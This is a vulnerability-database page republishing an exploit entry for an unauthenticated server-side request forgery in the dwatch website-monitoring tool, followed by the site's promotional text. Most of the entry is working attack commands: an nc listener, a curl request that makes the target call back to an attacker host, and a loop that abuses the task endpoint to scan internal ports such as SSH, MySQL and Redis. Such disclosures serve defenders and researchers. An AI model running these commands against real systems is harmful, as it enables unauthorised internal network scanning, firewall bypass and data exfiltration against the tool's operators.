Vulners
Lucene search
📄 dwatch 0.0.2 Server-Side Request Forgery
# Exploit Title: dwatch 0.0.2 - Unauthenticated SSRF via Task URL
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Software: https://github.com/dhjz/dwatch
# Vendor: https://github.com/dhjz/dwatch
# Version: Latest
# Tested on: Linux
# Description:
dwatch is a website monitoring tool that allows unauthenticated users to
create
monitoring tasks via the /api/task/save endpoint. The 'url' parameter
accepts
arbitrary URLs and makes HTTP requests to them. This Server-Side Request
Forgery
(SSRF) vulnerability allows attackers to:
1. Scan internal network services
2. Access internal HTTP endpoints
3. Bypass firewall restrictions
4. Exfiltrate data to external servers
# Proof of Concept:
1. Set up listener on attacker machine:
nc -lvnp 8888
2. Create malicious task:
curl -X POST "http://TARGET:3457/api/task/save" \
-H "Content-Type: application/json" \
-d '{"name":"SSRF PoC","url":"http://ATTACKER_IP:8888/ssrf","spec":"*/5
* * * * *"}'
3. Target executes request to attacker server, confirming SSRF.
# Internal Network Scanning PoC:
for port in 22 80 443 3306 5432 6379 8080 3457; do
curl -X POST "http://TARGET:3457/api/task/save" \
-H "Content-Type: application/json" \
-d "{\"name\":\"scan_$port\",\"url\":\"http://127.0.0.1:$port\",\"spec\":\"*/10
* * * * *\"}"
doneData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9